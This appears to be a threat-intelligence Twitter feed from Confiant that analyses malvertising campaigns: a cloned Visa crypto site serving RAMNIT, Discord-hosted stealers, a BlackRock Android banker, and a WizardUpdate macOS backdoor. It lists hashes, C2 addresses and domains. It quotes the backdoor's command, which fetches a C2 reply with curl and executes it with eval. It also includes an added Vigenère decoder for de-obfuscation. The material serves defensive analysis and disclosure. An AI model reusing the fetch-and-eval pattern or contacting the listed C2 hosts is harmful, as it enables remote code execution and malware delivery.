@WeAreConfiant Threat Intelligence feeds account, fighting malvertisers since 2013 ⚔️

Joined December 2020
Visa has processed a cryptocurrency payment directly on the Ethereum blockchain as part of a new service the payment giant plans to introduce later this year. Guess what? Malvertisers too :) Below: real site vs fake site (set up by malvertisers). Can you spot the difference?
The malicious website visa-eth[.]com is a perfect copy and delivers malware! They replaced the "Apply now" button with a download-client button 👾 Can you spot the difference?
The downloaded client is a RAMNIT Trojan: 380f9cd4c7126115e730ccc7343c5bfe6a0e907c0d6113fd9dfb29bd55898d53 (visa-eth.com-Setup.exe), communicating with 194.135.20.72, metamaskio[.]space 31.31.196.172, and 23.108.57.102 (VNC module).
New malvertising campaign targeting US, PL, HK, redirecting to malicious domains: reappcurvatheding[.]ga, hydbede[.]ga, toiklunex[.]gq, menctiluseemni[.]ga, helptekxlensdercimas[.]gq, anekenoh[.]gq, delivering malware payloads hosted via @discord servers 👾😱 (Thread)
Malware download page: <h1>Click to download</h1> <a href="cdn.discordapp.com/attachmen…"><img src="cap eng.png" alt="cap" style="width:300px" ></a>
As of now, two malware samples spotted, one for Windows (Raccoon stealer) and one for Android (still under analysis): e6b73a330e8708cc1799190e79707861235ca67d7a1d1cecbc80bd21ea95a02c and 9f17b1ed611601847aaf8e8e183a729f0f2fe32baf5192a2a6dce87a4768c750. Stay tuned ⏳
Confirmed, the Android sample is a BlackRock Android variant, targeting 141 Android banking apps, communicating with a C2 server, panel at: http://91[.]214[.]124[.]199/ #BlackRock #C2 #panel hosted in VPSSC Networks LTD
After our previous tweets, a new WizardUpdate macOS backdoor resurfaced. This time the .PKG was signed with Developer ID: ALEX KARAMANOLIS (NPBQVS7625). SHA-256: 7cf06122d84e8aebc2ef15f72e61affa5e070d0e49581474f1ec64a162da6a50 C2: subvideotube[.]com What's new? (thread)
The delivery mechanism uses a signed .PKG file, with changes made to the backdoor code and to the way C2 commands are executed. WizardUpdate backdoor hash is efbabbece4741dfd2692e89f72d487560090723e3150f79ec3975360799b0633 (SubVideoTubeStatusAgent.zip).
Instead of C2 commands being executed with system(), they are now executed using popen():
What does this popen() execute? It executes the following $CMD and runs an "eval" on the C2 reply :) MAID=system_profiler SPHardwareDataType | awk '/UUID/ { print $3 }' API_URl = api.subvideotube.com/v2/uoi?…{MAID}&pr=subvideotube CMD=$(curl --connect-timeout 900 -L "{API_URL}");eval "$CMD"
We noted that the strings above were obfuscated using a Vigenère cipher with a key hardcoded in the sample, "LBZEWWERBC". Only, this Vigenère cipher implementation was deliberately copy/pasted from this GitHub repo: github.com/philipperemy/easy…
Below is the original source code vs. this backdoor's decompiled code. We clearly see a 100% match; we also notice the function names weren't stripped.
Another copy/paste: the decrypt() function is exactly the same as well:
Finally, we can find the obfuscated strings within the binary, and our script on the right decrypts them:
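As an added illustration of the de-obfuscation step described in the thread (not Confiant's script and not the repository's code), the decoder below applies a Vigenère cipher with the key reported in the sample, "LBZEWWERBC", to constructed ciphertext. The classic letters-only variant (key position advances only on A-Z/a-z, other bytes pass through) is an assumption; the sample's actual alphabet and case handling must be confirmed against the decompiled decrypt() before trusting output on real extracted strings.

```python
"""Vigenère string de-obfuscator for analyst use (added example).

Assumption: classic letters-only Vigenère. Verify the variant against the
binary's decrypt() before relying on it for real extracted strings.
"""

KEY = "LBZEWWERBC"  # hardcoded key reported in the WizardUpdate sample


def _shift(ch: str, k: int) -> str:
    """Shift one ASCII letter by k positions (may be negative), keeping case."""
    base = ord("A") if ch.isupper() else ord("a")
    return chr((ord(ch) - base + k) % 26 + base)


def _vigenere(text: str, key: str, decrypt: bool) -> str:
    out, j = [], 0
    for ch in text:
        if ch.isascii() and ch.isalpha():
            k = ord(key[j % len(key)].upper()) - ord("A")
            out.append(_shift(ch, -k if decrypt else k))
            j += 1  # key position advances only on letters (assumed variant)
        else:
            out.append(ch)  # digits, punctuation and whitespace pass through
    return "".join(out)


def vigenere_encrypt(plaintext: str, key: str = KEY) -> str:
    return _vigenere(plaintext, key, decrypt=False)


def vigenere_decrypt(ciphertext: str, key: str = KEY) -> str:
    return _vigenere(ciphertext, key, decrypt=True)


# Constructed ciphertexts standing in for strings pulled out of a binary.
# They were produced with vigenere_encrypt() above, not taken from the sample.
CONSTRUCTED_BLOBS = [
    "dzrxai_tiphtmdv",  # vigenere_encrypt("system_profiler")
    "pwzp",             # vigenere_encrypt("eval")
]


def decode_blobs(blobs, key: str = KEY) -> list:
    """Decrypt every extracted string with the hardcoded key."""
    return [vigenere_decrypt(b, key) for b in blobs]


if __name__ == "__main__":
    for blob, plain in zip(CONSTRUCTED_BLOBS, decode_blobs(CONSTRUCTED_BLOBS)):
        print(f"{blob!r} -> {plain!r}")
```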
Malvertisers, maybe you should try harder? Again, Kudos to @Apple for revoking the certificate.
The sample 7cf06122d84e8aebc2ef15f72e61affa5e070d0e49581474f1ec64a162da6a50 we found isn't on VT, so we just uploaded it. virustotal.com/gui/file/7cf0…